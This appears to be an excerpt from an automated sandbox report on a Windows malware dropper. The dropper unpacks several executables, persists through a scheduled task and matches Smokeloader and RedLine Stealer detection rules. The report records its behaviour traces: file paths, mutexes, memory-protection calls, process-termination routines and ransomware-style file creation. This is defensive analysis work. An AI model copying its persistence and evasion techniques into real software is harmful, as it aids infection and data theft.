                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 49%
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeProcess Stats: CPU usage > 49%
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_007FF09C NtProtectVirtualMemory,NtProtectVirtualMemory,8_2_007FF09C
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_007FEB5C NtAllocateVirtualMemory,8_2_007FEB5C
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F778BB0_2_00F778BB
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F788600_2_00F78860
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F770490_2_00F77049
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F731A80_2_00F731A8
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01047B6E0_2_01047B6E
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F34B300_2_00F34B30
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F34DE00_2_00F34DE0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F72D100_2_00F72D10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7779B0_2_00F7779B
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F67F360_2_00F67F36
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_000D70491_2_000D7049
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_000D88601_2_000D8860
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_000D78BB1_2_000D78BB
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_000D31A81_2_000D31A8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00094B301_2_00094B30
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_000D2D101_2_000D2D10
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00094DE01_2_00094DE0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_000C7F361_2_000C7F36
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_000D779B1_2_000D779B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_000D70492_2_000D7049
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_000D88602_2_000D8860
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_000D78BB2_2_000D78BB
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_000D31A82_2_000D31A8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00094B302_2_00094B30
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_000D2D102_2_000D2D10
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00094DE02_2_00094DE0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_000C7F362_2_000C7F36
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_000D779B2_2_000D779B
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_004200407_2_00420040
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_0041D6277_2_0041D627
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00409EF07_2_00409EF0
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_0040996B7_2_0040996B
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_0041F3CD7_2_0041F3CD
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B202A77_2_00B202A7
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B1D88E7_2_00B1D88E
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B1F6347_2_00B1F634
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B1C2017_2_00B1C201
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B05D927_2_00B05D92
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B09BD27_2_00B09BD2
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B109377_2_00B10937
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B0A1577_2_00B0A157
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00CD283B8_2_00CD283B
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0040A9608_2_0040A960
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004261708_2_00426170
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0040E2A98_2_0040E2A9
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00416B7E8_2_00416B7E
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00439B908_2_00439B90
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004233A08_2_004233A0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00436C408_2_00436C40
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0043DCF08_2_0043DCF0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004215F08_2_004215F0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0042C6D78_2_0042C6D7
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0043E6908_2_0043E690
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0042BFD38_2_0042BFD3
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00410FD68_2_00410FD6
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0042BFDA8_2_0042BFDA
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004087F08_2_004087F0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00436F908_2_00436F90
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004097B08_2_004097B0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00425F7D8_2_00425F7D
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004090708_2_00409070
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0043A0308_2_0043A030
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004038C08_2_004038C0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004380D98_2_004380D9
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0041D8E08_2_0041D8E0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0042D0858_2_0042D085
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004280B08_2_004280B0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0042297F8_2_0042297F
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0042A1008_2_0042A100
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004379008_2_00437900
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00416E978_2_00416E97
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004059108_2_00405910
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004259208_2_00425920
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004301D08_2_004301D0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004089908_2_00408990
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004171908_2_00417190
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00414A408_2_00414A40
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0041BA488_2_0041BA48
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0040CA548_2_0040CA54
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004042708_2_00404270
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004062008_2_00406200
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00423A008_2_00423A00
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0043CAC08_2_0043CAC0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0043E2C08_2_0043E2C0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004292D08_2_004292D0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00415ADC8_2_00415ADC
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0042BA8D8_2_0042BA8D
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004192BA8_2_004192BA
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0040B3518_2_0040B351
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0041CB5A8_2_0041CB5A
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004093608_2_00409360
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0041C3608_2_0041C360
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00411B1B8_2_00411B1B
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0043533A8_2_0043533A
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0043CBD68_2_0043CBD6
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0043A3F08_2_0043A3F0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00404BA08_2_00404BA0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0040D44C8_2_0040D44C
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00434C4D8_2_00434C4D
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00419C108_2_00419C10
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00418C1E8_2_00418C1E
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0041D4208_2_0041D420
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0041DC208_2_0041DC20
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004364308_2_00436430
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0043CCE08_2_0043CCE0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00422CF88_2_00422CF8
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00427C9D8_2_00427C9D
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0043CD608_2_0043CD60
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004165718_2_00416571
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00423D308_2_00423D30
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0041DE408_2_0041DE40
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004126708_2_00412670
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004256708_2_00425670
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0041AE008_2_0041AE00
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0043CE008_2_0043CE00
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00423E308_2_00423E30
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004156D08_2_004156D0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00415EE08_2_00415EE0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004266E78_2_004266E7
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004066908_2_00406690
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004366908_2_00436690
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00416E978_2_00416E97
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00402EA08_2_00402EA0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004376B08_2_004376B0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00426EBE8_2_00426EBE
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00428F5D8_2_00428F5D
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0042B7638_2_0042B763
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00425F7D8_2_00425F7D
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00414F088_2_00414F08
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004187318_2_00418731
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0041EF308_2_0041EF30
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_004167A58_2_004167A5
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00418FAD8_2_00418FAD
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0043DFB08_2_0043DFB0
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeProcess token adjusted: Security
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00F480C0 appears 130 times
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: String function: 00414A30 appears 76 times
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: String function: 00408000 appears 52 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 000ADF80 appears 36 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 000A80C0 appears 260 times
                          Source: random[2].exe0.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 09be480dc7.exe.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 00000024.00000002.4211879385.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                          Source: 00000007.00000002.3467949827.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                          Source: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                          Source: 00000024.00000002.4175579717.0000000000E0C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                          Source: random[1].exe2.6.drStatic PE information: Section: hkzervik ZLIB complexity 0.9946665575667881
                          Source: b6866cbf49.exe.6.drStatic PE information: Section: hkzervik ZLIB complexity 0.9946665575667881
                          Source: random[2].exe2.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                          Source: random[2].exe2.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                          Source: e614d88998.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                          Source: e614d88998.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                          Source: skotes.exe.0.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                          Source: JEBGCBAFCG.exe.27.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                          Source: random[3].exe.27.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                          Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                          Source: classification engineClassification label: mal100.rans.spre.troj.spyw.expl.evad.winEXE@113/1458@13/100
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_004152A5 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,7_2_004152A5
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00436F90 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,8_2_00436F90
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7272:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2656:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4000:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7144:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:64:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeMutant created: \Sessions\1\BaseNamedObjects\BEWAREBEAST666
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: b6866cbf49.exe, 0000001B.00000002.3355742283.0000000005CBB000.00000004.00000020.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3403870715.000000006BEEF000.00000002.00000001.01000000.0000001C.sdmp, b6866cbf49.exe, 0000001B.00000002.3381923396.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: b6866cbf49.exe, 0000001B.00000002.3355742283.0000000005CBB000.00000004.00000020.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3403870715.000000006BEEF000.00000002.00000001.01000000.0000001C.sdmp, b6866cbf49.exe, 0000001B.00000002.3381923396.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: b6866cbf49.exe, 0000001B.00000002.3355742283.0000000005CBB000.00000004.00000020.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3403870715.000000006BEEF000.00000002.00000001.01000000.0000001C.sdmp, b6866cbf49.exe, 0000001B.00000002.3381923396.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: b6866cbf49.exe, 0000001B.00000002.3355742283.0000000005CBB000.00000004.00000020.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3403870715.000000006BEEF000.00000002.00000001.01000000.0000001C.sdmp, b6866cbf49.exe, 0000001B.00000002.3381923396.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: b6866cbf49.exe, 0000001B.00000002.3355742283.0000000005CBB000.00000004.00000020.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3403870715.000000006BEEF000.00000002.00000001.01000000.0000001C.sdmp, b6866cbf49.exe, 0000001B.00000002.3381923396.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: b6866cbf49.exe, 0000001B.00000002.3355742283.0000000005CBB000.00000004.00000020.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3381923396.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                          Source: b6866cbf49.exe, 0000001B.00000002.3355742283.0000000005CBB000.00000004.00000020.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3403870715.000000006BEEF000.00000002.00000001.01000000.0000001C.sdmp, b6866cbf49.exe, 0000001B.00000002.3381923396.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
